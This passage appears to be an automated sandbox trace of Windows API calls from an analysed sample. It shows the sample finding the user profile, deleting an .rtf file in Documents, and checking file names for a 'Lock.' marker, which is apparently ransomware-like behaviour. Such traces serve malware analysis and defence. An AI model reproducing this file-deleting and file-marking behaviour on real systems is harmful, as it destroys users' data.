hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0261.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0261.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0261.162] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0261.163] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0261.163] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0261.163] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0261.163] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0261.163] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0261.163] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0261.163] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0261.163] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0261.163] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0261.163] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0261.163] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0261.163] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0261.163] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0261.163] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0261.164] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0261.164] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0261.164] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0261.164] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0261.164] CryptReleaseContext (hProv=0xad2be8, dwFlags=0x0) returned 1 [0261.164] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0261.164] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0261.164] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0261.164] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0261.164] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0261.164] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0261.164] FreeLibrary (hLibModule=0x74d40000) returned 1 [0261.164] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0261.164] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0261.165] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0261.167] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0261.168] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0261.169] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0261.169] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0261.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0261.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0261.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa110 [0261.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0261.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0261.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9fd8 [0261.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0261.169] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0261.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0261.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0261.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0261.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0261.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0261.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0261.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0261.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0261.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0261.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0261.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0261.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0261.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0261.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0261.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0261.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0261.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x24207f0 [0261.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0261.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0261.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0261.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0261.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0261.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0261.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0261.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0261.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0261.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0261.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0261.171] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x6c) returned 0x240c8d0 [0261.171] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/B1NB4QkFt.rtf", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\B1NB4QkFt.rtf", lpFilePart=0x8bedfc*="B1NB4QkFt.rtf") returned 0x35 [0261.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240c8d0 | out: hHeap=0x25c0000) returned 1 [0261.171] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\B1NB4QkFt.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\b1nb4qkft.rtf")) returned 0x20 [0261.171] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\B1NB4QkFt.rtf", lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x12b4b470, ftCreationTime.dwHighDateTime=0x1d4ce38, ftLastAccessTime.dwLowDateTime=0x4276a270, ftLastAccessTime.dwHighDateTime=0x1d4d04c, ftLastWriteTime.dwLowDateTime=0x4276a270, ftLastWriteTime.dwHighDateTime=0x1d4d04c, nFileSizeHigh=0x0, nFileSizeLow=0xd827, dwReserved0=0x1a80, dwReserved1=0x4, cFileName="B1NB4QkFt.rtf", cAlternateFileName="B1NB4Q~1.RTF")) returned 0xaa59a0 [0261.171] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\B1NB4QkFt.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\b1nb4qkft.rtf")) returned 1 [0261.173] FindNextFileW (in: hFindFile=0xaa59a0, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x12b4b470, ftCreationTime.dwHighDateTime=0x1d4ce38, ftLastAccessTime.dwLowDateTime=0x4276a270, ftLastAccessTime.dwHighDateTime=0x1d4d04c, ftLastWriteTime.dwLowDateTime=0x4276a270, ftLastWriteTime.dwHighDateTime=0x1d4d04c, nFileSizeHigh=0x0, nFileSizeLow=0xd827, dwReserved0=0x1a80, dwReserved1=0x4, cFileName="B1NB4QkFt.rtf", cAlternateFileName="B1NB4Q~1.RTF")) returned 0 [0261.174] FindClose (in: hFindFile=0xaa59a0 | out: hFindFile=0xaa59a0) returned 1 [0261.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0261.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0261.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0261.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0261.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0261.174] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0261.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0261.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0261.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0261.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0261.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0261.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0261.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0261.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0261.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0261.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1828 [0261.175] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0261.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0261.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0261.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9fd8 [0261.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0261.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0261.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ab328 [0261.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0261.175] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0261.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0261.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0261.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0261.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0261.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0261.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0261.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0261.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0261.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0261.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0261.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0261.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0261.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0261.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0261.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0261.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0261.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x24207f0 [0261.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0261.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0261.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0261.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0261.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0261.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0261.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0261.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0261.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0261.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0261.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0261.177] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0261.177] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0261.177] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0261.177] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0261.177] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0261.177] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0261.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0261.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0261.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0261.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0261.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0261.177] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x6c) returned 0x240c8d0 [0261.177] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/B1NB4QkFt.rtf", nBufferLength=0x104, lpBuffer=0x8bf664, lpFilePart=0x8bf658 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\B1NB4QkFt.rtf", lpFilePart=0x8bf658*="B1NB4QkFt.rtf") returned 0x35 [0261.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240c8d0 | out: hHeap=0x25c0000) returned 1 [0261.177] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\B1NB4QkFt.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\b1nb4qkft.rtf")) returned 0xffffffff [0261.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0261.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0261.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0261.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0261.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0261.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0261.178] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0261.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d760 | out: hHeap=0x25c0000) returned 1 [0261.178] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0261.178] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0261.178] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0261.178] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0261.178] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0261.178] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0261.178] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0261.178] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0261.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0261.178] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0261.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0261.178] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0261.179] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0261.179] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0261.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0261.179] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="D3BEewSKP- XS.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0261.179] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3BEewSKP- XS.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0261.179] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BEewSKP- XS.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0261.179] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EewSKP- XS.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0261.179] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ewSKP- XS.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0261.179] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wSKP- XS.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0261.179] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SKP- XS.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0261.179] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="KP- XS.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0261.179] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="P- XS.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0261.179] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="- XS.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0261.179] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" XS.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0261.179] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XS.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0261.179] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0261.179] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0261.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0261.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0261.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0261.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0261.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0261.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0261.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0261.180] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d760 [0261.180] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0261.180] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0261.180] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0261.180] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0261.180] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0261.180] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0261.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0261.180] 